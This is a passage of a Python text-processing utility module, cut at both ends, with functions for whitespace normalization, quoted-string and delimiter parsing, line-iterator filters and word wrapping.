_in_word\n result.append(c)\n return empty.join(result)\n\n@_export\ndef normalize_whitespace(s, separators=None, replacement=None):\n \"\"\"\n Returns s, but with every run of consecutive\n separator characters turned into a replacement string.\n By default turns all runs of consecutive whitespace\n characters into a single space character.\n\n s may be str or bytes.\n separators should be an iterable of either str or bytes objects,\n matching s.\n replacement should be either a str or bytes object,\n also matching s, or None (the default).\n If replacement is None, normalize_whitespace will use\n a replacement string consisting of a single space character.\n\n Leading or trailing runs of separator characters will\n be replaced with the replacement string, e.g.:\n\n normalize_whitespace(\" a b c\") == \" a b c\".\n\n You can pass in an instance of a subclass of bytes or str\n for s and elements of separators, but the base class\n for both must be the same (str or bytes).\n normalize_whitespace will only return str or bytes objects.\n \"\"\"\n\n if isinstance(s, bytes):\n empty = b''\n default_replacement = b' '\n default_separators = bytes_whitespace_without_crlf\n s_type = bytes\n else:\n empty = ''\n default_replacement = ' '\n default_separators = whitespace_without_crlf\n s_type = str\n\n if separators is None:\n separators = default_separators\n elif isinstance(separators, s_type):\n if s_type == bytes:\n # not iterable of bytes, literally a bytes string.\n # split it ourselves. otherwise, _separators_to_re will\n # iterate over it, which... yields integers! oops!\n separators = _iterate_over_bytes(separators)\n separators = tuple(separators)\n else:\n cast_separators = []\n for o in separators:\n if not isinstance(o, s_type):\n raise TypeError(\"separators must be an iterable of non-empty objects the same type as s, or None\")\n if not o:\n raise ValueError(\"separators must be an iterable of non-empty objects the same type as s, or None\")\n cast_separators.append(o)\n if not cast_separators:\n raise ValueError(\"separators must be an iterable of non-empty objects the same type as s, or None\")\n separators = tuple(cast_separators)\n\n if replacement is None:\n replacement = default_replacement\n elif not isinstance(replacement, s_type):\n raise TypeError(\"replacement must be the same type as s, or None\")\n\n if not s:\n return empty\n\n # normalize_whitespace has a fast path for\n # normalizing whitespace on str objects.\n # if your \"separators\" qualifies,\n # it'll automatically use the fast path.\n #\n # we can't use the fast path for bytes objects,\n # because it won't work with encoded whitespace\n # characters > chr(127).\n #\n # (it'd *usually* work, sure.\n # but \"usually\" isn't good enough for big!)\n if ( (separators is whitespace_without_crlf)\n or (separators is whitespace)\n ):\n if not s.strip():\n return replacement\n words = s.split()\n if s[:1].isspace():\n words.insert(0, empty)\n if s[-1:].isspace():\n words.append(empty)\n cleaned = replacement.join(words)\n return cleaned\n\n words = list(multisplit(s, separators, keep=False, separate=False, strip=False, reverse=False, maxsplit=-1))\n cleaned = replacement.join(words)\n del words\n return cleaned\n\n\n@_export\ndef split_quoted_strings(s, quotes=None, *, triple_quotes=True, backslash=None):\n \"\"\"\n Splits s into quoted and unquoted segments.\n\n s can be either str or bytes.\n\n quotes is an iterable of quote separators, either str or bytes matching s.\n Note that split_quoted_strings only supports 
quote *characters*, as in,\n    each quote separator must be exactly one character long.\n\n    Returns an iterator yielding 2-tuples:\n        (is_quoted, segment)\n    where segment is a substring of s, and is_quoted is true if the segment is\n    quoted.  Joining all the segments together recreates s.\n\n    If triple_quotes is true, supports \"triple-quoted\" strings like Python.\n\n    If backslash is a character, this character will escape characters inside\n    a quoted string, like the backslash character inside strings in Python.\n\n    You can pass in an instance of a subclass of bytes or str\n    for s and quotes, but the base class for both must be\n    the same (str or bytes).  split_quoted_strings will only\n    return str or bytes objects.\n    \"\"\"\n    if isinstance(s, bytes):\n        empty = b''\n        if quotes is None:\n            quotes=(b'\"', b\"'\")\n        if backslash is None:\n            backslash = b'\\\\'\n        i = _iterate_over_bytes(s)\n    else:\n        empty = ''\n        if quotes is None:\n            quotes=('\"', \"'\")\n        if backslash is None:\n            backslash = '\\\\'\n        i = s\n    empty_join = empty.join\n\n    i = PushbackIterator(i)\n    in_quote = None\n    in_triple_quote = False\n    in_backslash = False\n    text = []\n    for c in i:\n        if not in_quote:\n            # encountered character while not in quoted string.\n            if c not in quotes:\n                # general case.  append unquoted character to our unquoted string.\n                text.append(c)\n                continue\n            if not triple_quotes:\n                # triple quotes are off, encountered quote.\n                # flush unquoted string, start quoted string.\n                if text:\n                    yield False, empty_join(text)\n                    text.clear()\n                text.append(c)\n                in_quote = c\n                continue\n            # scan for triple quotes.\n            c2 = next(i)\n            if c2 != c:\n                # only a single quote mark.  flush unquoted string, start quoted string.\n                i.push(c2)\n                if text:\n                    yield False, empty_join(text)\n                    text.clear()\n                text.append(c)\n                in_quote = c\n                continue\n            c3 = i.next(None)\n            if c3 != c:\n                # two quotes in a row, but not three.\n                # flush unquoted string, emit empty quoted string.\n                if text:\n                    yield False, empty_join(text)\n                    text.clear()\n                yield True, c*2\n                if c3 is not None:\n                    i.push(c3)\n                continue\n            # triple quoted string.\n            # flush unquoted string, start triple quoted string.\n            if text:\n                yield False, empty_join(text)\n                text.clear()\n            text.append(c*3)\n            in_quote = c\n            in_triple_quote = c\n            continue\n\n        # handle quoted string\n        if in_backslash:\n            # previous character was a backslash.\n            # append this character no matter what it is.\n            text.append(c)\n            in_backslash = False\n            continue\n        if c == backslash:\n            # encountered backslash character.\n            # set flag so we append the next character,\n            # no matter what it is.\n            in_backslash = True\n            text.append(c)\n            continue\n        if c != in_quote:\n            # character doesn't match our quote marker.\n            # append to our quoted string.\n            text.append(c)\n            continue\n        if not in_triple_quote:\n            # we found our quote mark, and we're only\n            # in single quotes (not triple quotes).\n            # finish and emit the quoted string,\n            # and return to unquoted mode.\n            text.append(c)\n            yield True, empty_join(text)\n            text.clear()\n            in_quote = False\n            continue\n        # we're in a triple-quoted string,\n        # and found one of our quote marks.\n        # scan to see if we got three in a row.\n        c2 = i.next(None)\n        c3 = i.next(None)\n        if c == c2 == c3:\n            # we found triple quotes.\n            # finish and emit the triple-quoted string,\n            # and return to unquoted mode.\n            text.append(c*3)\n            yield True, empty_join(text)\n            text.clear()\n            in_triple_quote = in_quote = False\n            continue\n        # didn't find triple quotes. 
append the single\n # quote mark to our quoted string and push the\n # other two characters back onto the iterator.\n text.append(c)\n if c2 is not None:\n if c3 is not None:\n i.push(c3)\n i.push(c2)\n\n # flush the remainder of the string we were building,\n # in whatever condition it's in.\n if text:\n yield in_quote, empty_join(text)\n\n\n@_export\nclass Delimiter:\n \"\"\"\n Class representing a delimiter for parse_delimiters.\n\n open is the opening delimiter character, can be str or bytes, must be length 1.\n close is the closing delimiter character, must be the same type as open, and length 1.\n backslash is a boolean: when inside this delimiter, can you escape delimiters\n with a backslash? (You usually can inside single or double quotes.)\n nested is a boolean: must other delimiters nest in this delimiter?\n (Delimiters don't usually need to be nested inside single and double quotes.)\n \"\"\"\n def __init__(self, open, close, *, backslash=False, nested=True):\n if isinstance(open, bytes):\n t = bytes\n else:\n t = str\n if not (isinstance(open, t) and isinstance(close, t)):\n raise TypeError(f\"open={open!r} and close={close!r}, they must be the same type, either str or bytes\")\n\n self.open = open\n self.close = close\n self.backslash = backslash\n self.nested = nested\n\n def __repr__(self): # pragma: no cover\n return f\"Delimiter(open={self.open!r}, close={self.close!r}, backslash={self.backslash}, nested={self.nested})\"\n\ndelimiter_parentheses = \"()\"\n_export_name('delimiter_parentheses')\n\ndelimiter_square_brackets = \"[]\"\n_export_name('delimiter_square_brackets')\n\ndelimiter_curly_braces = \"{}\"\n_export_name('delimiter_curly_braces')\n\ndelimiter_angle_brackets = \"<>\"\n_export_name('delimiter_angle_brackets')\n\ndelimiter_single_quote = Delimiter(\"'\", \"'\", backslash=True, nested=False)\n_export_name('delimiter_single_quote')\n\ndelimiter_double_quotes = Delimiter('\"', '\"', backslash=True, nested=False)\n_export_name('delimiter_double_quotes')\n\nparse_delimiters_default_delimiters = (\n delimiter_parentheses,\n delimiter_square_brackets,\n delimiter_curly_braces,\n delimiter_single_quote,\n delimiter_double_quotes,\n )\n_export_name('parse_delimiters_default_delimiters')\n\nparse_delimiters_default_delimiters_bytes = (\n b'()',\n b'[]',\n b'{}',\n Delimiter(b\"'\", b\"'\", backslash=True, nested=False),\n Delimiter(b'\"', b'\"', backslash=True, nested=False),\n )\n_export_name('parse_delimiters_default_delimiters_bytes')\n\n\n# break the rules\n_base_delimiter = Delimiter('a', 'b')\n_base_delimiter.open = _base_delimiter.close = None\n\n@_export\ndef parse_delimiters(s, delimiters=None):\n \"\"\"\n Parses a string containing nesting delimiters.\n Raises an exception if mismatched delimiters are detected.\n\n s may be str or bytes.\n\n delimiters may be either None or an iterable containing\n either Delimiter objects or objects matching s (str or bytes).\n Entries in the delimiters iterable which are str or bytes\n should be exactly two characters long; these will be used\n as the open and close arguments for a new Delimiter object.\n\n If delimiters is None, parse_delimiters uses a default\n value matching these pairs of delimiters:\n () [] {} \"\" ''\n The quote mark delimiters enable backslash quoting and disable nesting.\n\n Yields 3-tuples containing strings:\n (text, open, close)\n where text is the text before the next opening or closing delimiter,\n open is the trailing opening delimiter,\n and close is the trailing closing delimiter.\n At least 
one of these three strings will always be non-empty.\n If open is non-empty, close will be empty, and vice-versa.\n If s does not end with a closing delimiter, in the final tuple\n yielded, both open and close will be empty strings.\n\n You can only specify a particular character as an opening delimiter\n once, though you may reuse a particular character as a closing\n delimiter multiple times.\n \"\"\"\n if isinstance(s, bytes):\n s_type = bytes\n if delimiters is None:\n delimiters = parse_delimiters_default_delimiters_bytes\n backslash_character = b'\\\\'\n disallowed_delimiters = backslash_character\n empty = b''\n else:\n s_type = str\n if delimiters is None:\n delimiters = parse_delimiters_default_delimiters\n backslash_character = '\\\\'\n disallowed_delimiters = backslash_character\n empty = ''\n\n if not delimiters:\n raise ValueError(\"invalid delimiters\")\n # convert\n delimiters2 = []\n for d in delimiters:\n if isinstance(d, Delimiter):\n delimiters2.append(d)\n continue\n if isinstance(d, s_type):\n if not len(d) == 2:\n raise ValueError(f\"illegal delimiter string {d!r}, must be 2 characters long\")\n delimiters2.append(Delimiter(d[0:1], d[1:2]))\n continue\n raise TypeError(f\"invalid delimiter {d!r}\")\n\n delimiters = delimiters2\n # early-detect errors\n\n # scan for disallowed\n delimiter_characters = {d.open for d in delimiters} | {d.close for d in delimiters}\n disallowed = {disallowed_delimiters}\n illegal_delimiters = disallowed & delimiter_characters\n if illegal_delimiters:\n raise ValueError(\"illegal delimiters used: \" + \"\".join(illegal_delimiters))\n\n # closers is a set of closing delimiters *only*.\n # if open and close delimiters are the same (e.g. quote marks)\n # it shouldn't go in closers.\n seen = set()\n repeated = []\n closers = set()\n for d in delimiters:\n if d.open in seen:\n repeated.append(d.open)\n seen.add(d.open)\n if d.close != d.open:\n closers.add(d.close)\n\n if repeated:\n raise ValueError(\"these opening delimiters were used multiple times: \" + \" \".join(repeated))\n\n def parse_delimiters(s, delimiters):\n open_to_delimiter = {d.open: d for d in delimiters}\n\n text = []\n append = text.append\n def flush(open, close):\n s = empty.join(text)\n text.clear()\n assert s or open or close\n return s, open, close\n\n # d stores the *current* delimiter\n # d is not in stack.\n d = _base_delimiter\n stack = []\n backslash = d.backslash\n nested = d.nested\n close = None\n quoted = False\n\n for i, c in enumerate(_iterate_over_bytes(s)):\n if quoted:\n append(c)\n quoted = False\n continue\n if c == close:\n yield flush(empty, c)\n d = stack.pop()\n backslash = d.backslash\n nested = d.nested\n close = d.close\n continue\n if nested:\n if c in closers:\n # this is a closing delimiter,\n # but it doesn't match.\n # (if it did, we'd have handled it\n # in \"if c == close\" above.)\n raise ValueError(f\"mismatched closing delimiter at s[{i}]: expected {close}, got {c}\")\n next_d = open_to_delimiter.get(c)\n if next_d:\n yield flush(c, empty)\n stack.append(d)\n d = next_d\n backslash = d.backslash\n nested = d.nested\n close = d.close\n continue\n if backslash and (c == backslash_character):\n quoted = True\n append(c)\n\n if len(stack):\n stack.pop(0)\n stack.append(d)\n raise ValueError(\"s does not close all opened delimiters, needs \" + \" \".join(d.close for d in reversed(stack)))\n\n if text:\n yield flush(empty, empty)\n\n return parse_delimiters(s, delimiters)\n\n\n\n@_export\nclass LineInfo:\n \"\"\"\n The second object yielded by a 
lines iterator,\n containing metadata about the line.\n You can add your own fields by passing them in\n via **kwargs; you can also add new attributes\n or modify existing attributes as needed from\n inside a \"lines modifier\" function.\n \"\"\"\n def __init__(self, line, line_number, column_number, **kwargs):\n if not isinstance(line, (str, bytes)):\n raise TypeError(\"line must be str or bytes\")\n if not isinstance(line_number, int):\n raise TypeError(\"line_number must be int\")\n if not isinstance(column_number, int):\n raise TypeError(\"column_number must be int\")\n self.line = line\n self.line_number = line_number\n self.column_number = column_number\n self.__dict__.update(kwargs)\n\n def __repr__(self):\n names = list(self.__dict__)\n priority_names = ['line', 'line_number', 'column_number']\n fields = []\n for name in priority_names:\n names.remove(name)\n names.sort()\n names = priority_names + names\n for name in names:\n fields.append(f\"{name}={getattr(self, name)!r}\")\n text = \", \".join(fields)\n return f\"LineInfo({text})\"\n\n def __eq__(self, other):\n return isinstance(other, self.__class__) and (other.__dict__ == self.__dict__)\n\n\n@_export\nclass lines:\n def __init__(self, s, separators=None, *, line_number=1, column_number=1, tab_width=8, **kwargs):\n \"\"\"\n A \"lines iterator\" object. Splits s into lines, and iterates yielding those lines.\n\n \"s\" can be str, bytes, or any iterable of str or bytes.\n\n If s is neither str nor bytes, s must be an iterable;\n lines yields successive elements of s as lines. All objects\n yielded by this iterable should be homogeneous, either str or bytes.\n\n If s is str or bytes, and separators is None, lines\n will split s at line boundaries and yield those lines,\n including empty lines. If separators is not None,\n it must be an iterable of strings of the same type as s;\n lines will split s using multisplit.\n\n When iterated over, yields 2-tuples:\n (info, line)\n\n info is a LineInfo object, which contains three fields by default:\n * line - the original line, never modified\n * line_number - the line number of this line, starting at the\n line_number passed in and adding 1 for each successive line\n * column_number - the column this line starts on,\n starting at the column_number passed in, and adjusted when\n characters are removed from the beginning of line\n\n tab_width is not used by lines itself, but is stored internally and\n may be used by other lines modifier functions\n (e.g. lines_convert_tabs_to_spaces, lines_strip_indent). Similarly,\n all keyword arguments passed in via kwargs are stored internally\n and can be accessed by user-defined lines modifier functions.\n\n You can pass in an instance of a subclass of bytes or str\n for s and elements of separators, but the base class\n for both must be the same (str or bytes). 
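A minimal illustrative sketch:\n\n            for info, line in lines('a\\nb'):\n                print(info.line_number, line)\n            # prints '1 a' then '2 b'\n\n        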
lines will\n only yield str or bytes objects.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n if not isinstance(line_number, int):\n raise TypeError(\"line_number must be int\")\n if not isinstance(column_number, int):\n raise TypeError(\"column_number must be int\")\n if not isinstance(tab_width, int):\n raise TypeError(\"tab_width must be int\")\n\n is_bytes = isinstance(s, bytes)\n is_str = isinstance(s, str)\n if is_bytes or is_str:\n if not separators:\n separators = linebreaks if is_str else bytes_linebreaks\n i = multisplit(s, separators, keep=False, separate=True, strip=False)\n else:\n i = iter(s)\n is_bytes = None\n\n self.s = s\n self.separators = separators\n self.line_number = line_number\n self.column_number = column_number\n self.tab_width = tab_width\n self.s_is_bytes = is_bytes\n\n self.i = i\n\n self.__dict__.update(kwargs)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n line = next(self.i)\n if self.s_is_bytes is None:\n self.s_is_bytes = isinstance(line, bytes)\n return_value = (LineInfo(line, self.line_number, self.column_number), line)\n self.line_number += 1\n return return_value\n\n@_export\ndef lines_rstrip(li):\n \"\"\"\n A lines modifier function. Strips trailing whitespace from the\n lines of a \"lines iterator\".\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n for info, line in li:\n yield (info, line.rstrip())\n\n@_export\ndef lines_strip(li):\n \"\"\"\n A lines modifier function. Strips leading and trailing whitespace\n from the lines of a \"lines iterator\".\n\n If lines_strip removes leading whitespace from a line, it adds\n a field to the associated LineInfo object:\n * leading - the leading whitespace string that was removed\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n for info, line in li:\n lstripped = line.lstrip()\n if not lstripped:\n line = lstripped\n else:\n original_leading = line[:len(line) - len(lstripped)]\n if original_leading:\n leading = original_leading.expandtabs(li.tab_width)\n info.column_number += len(leading)\n line = lstripped.rstrip()\n info.leading = original_leading\n\n yield (info, line)\n\n@_export\ndef lines_filter_comment_lines(li, comment_separators):\n \"\"\"\n A lines modifier function. Filters out comment lines from the\n lines of a \"lines iterator\". Comment lines are lines whose first\n non-whitespace characters appear in the iterable of\n comment_separators strings passed in.\n\n What's the difference between lines_strip_comments and\n lines_filter_comment_lines?\n * lines_filter_comment_lines only recognizes lines that\n *start* with a comment separator (ignoring leading\n whitespace). Also, it filters out those lines\n completely, rather than modifying the line.\n * lines_strip_comments handles comment characters\n anywhere in the line, although it can ignore\n comments inside quoted strings. 
It truncates the\n line but still always yields the line.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n if not comment_separators:\n raise ValueError(\"illegal comment_separators\")\n\n if isinstance(comment_separators, bytes):\n comment_separators = _iterate_over_bytes(comment_separators)\n comment_separators_is_bytes = True\n else:\n comment_separators_is_bytes = isinstance(comment_separators[0], bytes)\n comment_separators = tuple(comment_separators)\n\n comment_pattern = _separators_to_re(comment_separators, comment_separators_is_bytes, separate=False, keep=False)\n comment_re = re.compile(comment_pattern)\n\n def lines_filter_comment_lines(li, comment_re):\n for info, line in li:\n s = line.lstrip()\n if comment_re.match(s):\n continue\n yield (info, line)\n return lines_filter_comment_lines(li, comment_re)\n\n\n@_export\ndef lines_containing(li, s, *, invert=False):\n \"\"\"\n A lines modifier function. Only yields lines\n that contain s. (Filters out lines that\n don't contain s.)\n\n If invert is true, returns the opposite--\n filters out lines that contain s.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n if invert:\n for t in li:\n if not s in t[1]:\n yield t\n return\n for t in li:\n if s in t[1]:\n yield t\n\n@_export\ndef lines_grep(li, pattern, *, invert=False, flags=0):\n \"\"\"\n A lines modifier function. Only yields lines\n that match the regular expression pattern.\n (Filters out lines that don't match pattern.)\n\n pattern can be str, bytes, or an re.Pattern object.\n If pattern is not an re.Pattern object, it's compiled\n with re.compile(pattern, flags=flags).\n\n If invert is true, returns the opposite--\n filters out lines that match pattern.\n\n Composable with all the lines_ functions from the big.text module.\n\n (In older versions of Python, re.Pattern was a private type called\n re._pattern_type.)\n \"\"\"\n if not isinstance_re_pattern(pattern):\n pattern = re.compile(pattern, flags=flags)\n search = pattern.search\n\n if invert:\n def lines_grep(li, search):\n for t in li:\n if not search(t[1]):\n yield t\n return\n return lines_grep(li, search)\n\n def lines_grep(li, search):\n for t in li:\n if search(t[1]):\n yield t\n return lines_grep(li, search)\n\n@_export\ndef lines_sort(li, *, reverse=False):\n \"\"\"\n A lines modifier function. Sorts all\n input lines before yielding them.\n\n Lines are sorted lexicographically,\n from lowest to highest.\n If reverse is true, lines are sorted\n from highest to lowest.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n lines = list(li)\n lines.sort(key=lambda t:t[1], reverse=reverse)\n yield from iter(lines)\n\n@_export\ndef lines_strip_comments(li, comment_separators, *, quotes=('\"', \"'\"), backslash='\\\\', rstrip=True, triple_quotes=True):\n \"\"\"\n A lines modifier function. Strips comments from the lines\n of a \"lines iterator\". Comments are substrings that indicate\n the rest of the line should be ignored; lines_strip_comments\n truncates the line at the beginning of the leftmost comment\n separator.\n\n If rstrip is true (the default), lines_strip_comments calls\n the rstrip() method on line after it truncates the line.\n\n If quotes is true, it must be an iterable of quote characters.\n (Each quote character MUST be a single character.)\n lines_strip_comments will parse the line and ignore comment\n characters inside quoted strings. 
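For example (an illustrative sketch):\n\n        li = lines_strip_comments(lines('x = 1 # note'), ('#',))\n        # yields the line 'x = 1', with info.comment == '# note'\n\n    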
If quotes is false,\n quote characters are ignored and line_strip_comments will\n truncate anywhere in the line.\n\n backslash and triple_quotes are passed in to\n split_quoted_string, which is used internally to detect\n the quoted strings in the line.\n\n Sets a new field on the associated LineInfo object for every line:\n * comment - the comment stripped from the line, if any.\n if no comment was found, \"comment\" will be an empty string.\n\n What's the difference between lines_strip_comments and\n lines_filter_comment_lines?\n * lines_filter_comment_lines only recognizes lines that\n *start* with a comment separator (ignoring leading\n whitespace). Also, it filters out those lines\n completely, rather than modifying the line.\n * lines_strip_comments handles comment characters\n anywhere in the line, although it can ignore\n comments inside quoted strings. It truncates the\n line but still always yields the line.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n if not comment_separators:\n raise ValueError(\"illegal comment_separators\")\n\n if isinstance(comment_separators, bytes):\n comment_separators = _iterate_over_bytes(comment_separators)\n comment_separators_is_bytes = True\n else:\n comment_separators_is_bytes = isinstance(comment_separators[0], bytes)\n comment_separators = tuple(comment_separators)\n\n if comment_separators_is_bytes:\n empty = b''\n else:\n empty = ''\n empty_join = empty.join\n\n comment_pattern = __separators_to_re(comment_separators, separators_is_bytes=comment_separators_is_bytes, separate=True, keep=True)\n re_comment = re.compile(comment_pattern)\n split = re_comment.split\n\n\n def lines_strip_comments(li, split, quotes, backslash, rstrip, triple_quotes):\n for info, line in li:\n if quotes:\n i = split_quoted_strings(line, quotes, backslash=backslash, triple_quotes=triple_quotes)\n else:\n i = ((False, line),)\n segments = []\n append = segments.append\n comment = []\n for is_quoted, segment in i:\n if comment:\n comment.append(segment)\n continue\n if is_quoted:\n append(segment)\n continue\n fields = split(segment, maxsplit=1)\n leading = fields[0]\n if len(fields) == 1:\n append(leading)\n continue\n # found a comment marker in an unquoted segment!\n if rstrip:\n leading = leading.rstrip()\n append(leading)\n comment = fields[1:]\n\n info.comment = empty_join(comment)\n line = empty_join(segments)\n yield (info, line)\n return lines_strip_comments(li, split, quotes, backslash, rstrip, triple_quotes)\n\n@_export\ndef lines_convert_tabs_to_spaces(li):\n \"\"\"\n A lines modifier function. Converts tabs to spaces for the lines\n of a \"lines iterator\", using the tab_width passed in to lines.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n for info, line in li:\n yield (info, line.expandtabs(li.tab_width))\n\n\n@_export\ndef lines_strip_indent(li):\n \"\"\"\n A lines modifier function. 
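A companion sketch for the stripping variant defined above (again a hypothetical input, assuming the module is importable as `big`; the quoted '#' survives because quotes defaults to ('"', "'")):

```python
import big

source = 'x = "#not a comment"  # a real comment\ny = 2\n'

for info, line in big.lines_strip_comments(big.lines(source), ('#',)):
    # info.comment holds the stripped text ('' when nothing was stripped)
    print(repr(line), '|', repr(info.comment))
```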
Automatically measures and strips indents.\n\n    Sets two new fields on the associated LineInfo object for every line:\n      * indent - an integer indicating how many indents it's observed\n      * leading - the leading whitespace string that was removed\n    Also updates LineInfo.column_number as needed.\n\n    Uses an intentionally simple algorithm.\n    Only understands tab and space characters as indent characters.\n    Internally detabs to spaces first for consistency, using the\n    tab_width passed in to lines.\n\n    You can only dedent out to a previous indent.\n    Raises IndentationError if there's an illegal dedent.\n\n    Composable with all the lines_ functions from the big.text module.\n    \"\"\"\n    indent = 0\n    leadings = []\n    for info, line in li:\n        lstripped = line.lstrip()\n        original_leading = line[:len(line) - len(lstripped)]\n        leading = original_leading.expandtabs(li.tab_width)\n        len_leading = len(leading)\n        # print(f\"{leadings=} {line=} {leading=} {len_leading=}\")\n        if leading.rstrip(' '):\n            raise ValueError(f\"lines_strip_indent can't handle leading whitespace character {leading[0]!r}\")\n        if not leading:\n            indent = 0\n            leadings.clear()\n            new_indent = False\n        elif not leadings:\n            new_indent = True\n        elif leadings[-1] == len_leading:\n            new_indent = False\n        elif len_leading > leadings[-1]:\n            new_indent = True\n        else:\n            # not equal, not greater than... must be less than!\n            new_indent = False\n            assert leadings\n            leadings.pop()\n            indent -= 1\n            while leadings:\n                if leadings[-1] == len_leading:\n                    break\n                if leadings[-1] < len_leading:\n                    new_indent = None\n                    break\n                leadings.pop()\n                indent -= 1\n            if not leadings:\n                new_indent = None\n\n        # print(f\"    >> {leadings=} {new_indent=}\")\n        if new_indent:\n            leadings.append(len_leading)\n            indent += 1\n        elif new_indent is None:\n            raise IndentationError(f\"line {info.line_number} column {len_leading + info.column_number}: unindent does not match any outer indentation level\")\n        info.leading = original_leading\n        info.indent = indent\n        if len_leading:\n            info.column_number += len_leading\n            line = lstripped\n\n        yield (info, line)\n\n@_export\ndef lines_filter_empty_lines(li):\n    \"\"\"\n    A lines modifier function.  Filters out the empty lines\n    of a \"lines iterator\".\n\n    Preserves the line numbers.  If lines 0 through 2 are empty,\n    line 3 is \"a\", line 4 is empty, and line 5 is \"b\",\n    will yield:\n        (3, \"a\")\n        (5, \"b\")\n\n    Composable with all the lines_ modifier functions in the big.text module.\n    \"\"\"\n    for t in li:\n        if not t[1]:\n            continue\n        yield t\n\n\n\n@_export\ndef wrap_words(words, margin=79, *, two_spaces=True):\n    \"\"\"\n    Combines 'words' into lines and returns the result as a string.\n    Similar to textwrap.wrap.\n\n    'words' should be an iterator yielding str or bytes strings, and\n    these strings should already be split at word boundaries.\n    Here's an example of a valid argument for words:\n        \"this is an example of text split at word boundaries\".split()\n\n    A single '\\n' indicates a line break.\n    If you want a paragraph break, embed two '\\n' characters in a row.\n\n    'margin' specifies the maximum length of each line.  The length of\n    every line will be less than or equal to 'margin', unless the length\n    of an individual element inside 'words' is greater than 'margin'.\n\n    If 'two_spaces' is true, elements from 'words' that end in\n    sentence-ending punctuation ('.', '?', and '!') will be followed\n    by two spaces, not one.\n\n    Elements in 'words' are not modified; any leading or trailing\n    whitespace will be preserved. 
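The dedent rule enforced above, that you may only dedent back to a level you have already seen, can be shown with a standalone sketch of the same stack algorithm (a simplified illustration; it ignores the LineInfo bookkeeping):

```python
def indent_levels(text, tab_width=8):
    stack, out = [], []
    for number, raw in enumerate(text.splitlines(), 1):
        stripped = raw.lstrip(' \t')
        if not stripped:
            continue  # blank lines don't affect indentation
        width = len(raw[:len(raw) - len(stripped)].expandtabs(tab_width))
        if not width:
            stack.clear()                # back to the left margin
        elif not stack or width > stack[-1]:
            stack.append(width)          # one level deeper
        else:
            while stack and stack[-1] > width:
                stack.pop()              # dedent: close deeper levels
            if not stack or stack[-1] != width:
                raise IndentationError(f"line {number}: bad dedent")
        out.append((number, len(stack), stripped))
    return out

# indent_levels("a:\n    b\n        c\n    d\n") ->
# [(1, 0, 'a:'), (2, 1, 'b'), (3, 2, 'c'), (4, 1, 'd')]
```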
You can use this to preserve\n whitespace where necessary, like in code examples.\n\n The objects yielded by words can be a subclass of either\n str or bytes, though wrap_words will only return str or bytes.\n All the objects yielded by words must have the same base class\n (str or bytes).\n \"\"\"\n words = iter(words)\n col = 0\n empty = None\n lastword = None\n text = []\n first_word = True\n\n for word in words:\n if first_word:\n first_word = False\n if isinstance(word, bytes):\n empty = lastword = b''\n sentence_ending_punctuation = (b'.', b'?', b'!')\n two_spaces = b' '\n one_space = b' '\n newline = b'\\n'\n else:\n empty = lastword = ''\n sentence_ending_punctuation = ('.', '?', '!')\n two_spaces = ' '\n one_space = ' '\n newline = '\\n'\n\n if word.isspace():\n lastword = word\n col = 0\n text.append(word)\n continue\n\n l = len(word)\n\n if two_spaces and lastword.endswith(sentence_ending_punctuation):\n space = two_spaces\n len_space = 2\n else:\n space = one_space\n len_space = 1\n\n if (l + len_space + col) > margin:\n if col:\n text.append(newline)\n col = 0\n elif col:\n text.append(space)\n col += len_space\n\n text.append(word)\n col += len(word)\n lastword = word\n\n if first_word:\n raise ValueError(\"no words to wrap\")\n return empty.join(text)\n\n\n\n_code_paragraph = \"code paragraph\"\n_text_paragraph = \"text paragraph\"\n\n@state.accessor()\nclass _column_wrapper_splitter:\n def __init__(self, is_bytes, tab_width, allow_code, code_indent, convert_tabs_to_spaces):\n # print(f\"\\n_column_wrapper_splitter({tab_width=}, {allow_code=}, {convert_tabs_to_spaces=})\")\n self.is_bytes = is_bytes\n if is_bytes:\n self.empty = b''\n self.tab_string = b'\\t'\n self.space_string = b' '\n self.newline_string = b'\\n'\n self.paragraph_string = b'\\n\\n'\n self.make_iterator = _iterate_over_bytes\n else:\n self.empty = ''\n self.tab_string = '\\t'\n self.space_string = ' '\n self.newline_string = '\\n'\n self.paragraph_string = '\\n\\n'\n self.make_iterator = iter\n self.tab_width = tab_width\n self.allow_code = allow_code\n self.code_indent = code_indent\n self.convert_tabs_to_spaces = convert_tabs_to_spaces\n\n self.words = []\n\n self.leading = []\n self.word = []\n self.code = []\n\n # used to regulate line and paragraph breaks.\n # can be _code_paragraph, _text_paragraph, or None.\n # (if None, we've already handled the appropriate break.)\n self.previous_paragraph = None\n\n self.state_manager = state.StateManager(self.state_initial)\n\n def emit(self, c):\n # print(f\" [emit]\", repr(c))\n self.words.append(c)\n\n def line_break(self):\n # print(f\" [ \\\\n]\")\n self.words.append(self.newline_string)\n\n def paragraph_break(self):\n # print(f\" [\\\\n\\\\n]\")\n self.words.append(self.paragraph_string)\n\n def write(self, c):\n # write consumes c and makes calls as appropriate to\n # self.state().\n #\n # first, write aggregates together all consecutive\n # non-line-breaking whitespace characters, which it\n # stores in 'leading'. 
if the next character is\n # a newline, it passes that single newline as 'word'.\n # otherwise it aggregates all consecutive non-whitespace\n # characters together, and passes those in as 'word'.\n #\n # thus we only call self.state() with two types of 'word':\n # * a word, which is non-whitespace, and\n # * a single '\\n'.\n # all other whitespace is passed in as 'leading'.\n #\n # so for example, this input:\n #\n # 'hello there\\nhow are you?\\n\\n \\n\\ti am fine.\\n so there!'\n #\n # will result in self.state being called with these words,\n # and with whitespace being set to these values:\n # leading word\n # ------- ------\n # '' 'hello'\n # ' ' 'there'\n # '' '\\n'\n # '' 'how'\n # ' ' 'are'\n # ' ' 'you?'\n # '' '\\n'\n # '' '\\n'\n # ' ' '\\n'\n # '\\t' 'i'\n # ' ' 'am'\n # ' ' 'fine.'\n # '' '\\n'\n # ' ' 'so'\n # ' ' 'there!'\n #\n # consecutive calls to write() behave the same as calling write()\n # once with both inputs concatenated together. this:\n # self.write('abc')\n # self.write('def')\n # is the same as calling\n # self.write('abcdef')\n #\n # you should call close() after the last write() call.\n\n leading = self.leading\n word = self.word\n write_word = 